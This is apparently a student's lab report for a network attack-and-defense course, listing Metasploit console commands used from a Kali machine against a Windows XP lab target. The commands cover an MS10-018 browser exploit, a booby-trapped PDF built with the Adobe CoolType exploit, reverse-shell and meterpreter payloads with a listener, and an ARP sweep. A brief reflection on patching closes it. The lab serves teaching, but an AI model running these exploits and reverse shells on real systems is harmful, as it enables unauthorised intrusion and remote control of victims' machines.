标签:hand log name set path https erp 问题: 总结
kali IP:192.168.147.130
XP IP:192.168.147.129
set payload generic/shell_reverse_tcp //选择攻击载荷
show options //查看配置信息
set RHOST 192.168.147.129 //设置靶机IP,端口默认为445
set LPORT 5332
set LHOST 192.168.147.130 //设置攻方IP
set target 6 //通过show targets查看可攻击平台
exploit
kali IP:192.168.147.130
XP IP:192.168.147.129
search ms 10_018
use exploit/windows/browser/ms10_018_ie_behaviors //进入该模块
show payloads //显示可用载荷
set payload windows/meterpreter/reverse_tcp
set SRVHOST 192.168.147.130 //设置攻击机IP
set RHOST 192.168.147.129
set LHOST 192.168.147.130
set URIPATH hacker
show targets
exploit //发起渗透攻击
kali IP:192.168.147.130
XP IP:192.168.147.129
msfconsole
use windows/fileformat/adobe_cooltype_sing //选择攻击模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.147.130 //攻击机 IP
set LPORT 5332
set FILENAME 20175332.pdf //设置生成的pdf文件名
exploit //发起攻击
use exploit/multi/handler //进入监听模块
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.147.130 //攻击机 IP
set LPORT 5332
exploit
use auxiliary/scanner/discovery/arp_sweep
set RHOST 192.168.147.129/24
set THREAD 50
show options
run
exploit利用漏洞进行攻击
payload荷载:一段shellcode代码
encode去除坏字符
缺少自己发现漏洞的能力,现在所掌握的技术都是建立在已知漏洞的基础上,都是使用已他人发现的漏洞进行实践,并且很多实验过程中都需要对靶机做出一定的处理,比如关闭防火墙之类的,并没有真正实现一些东西。
此次实验,我充分感受到了msf的功能的强大,在以后计算机的使用中一定要经常更新系统补丁。
2019-2020-2-20175332 张苗-《网络攻防技术》exp6 MSF基础应用
标签:hand log name set path https erp 问题: 总结
原文地址:https://www.cnblogs.com/20175332zm/p/12784882.html
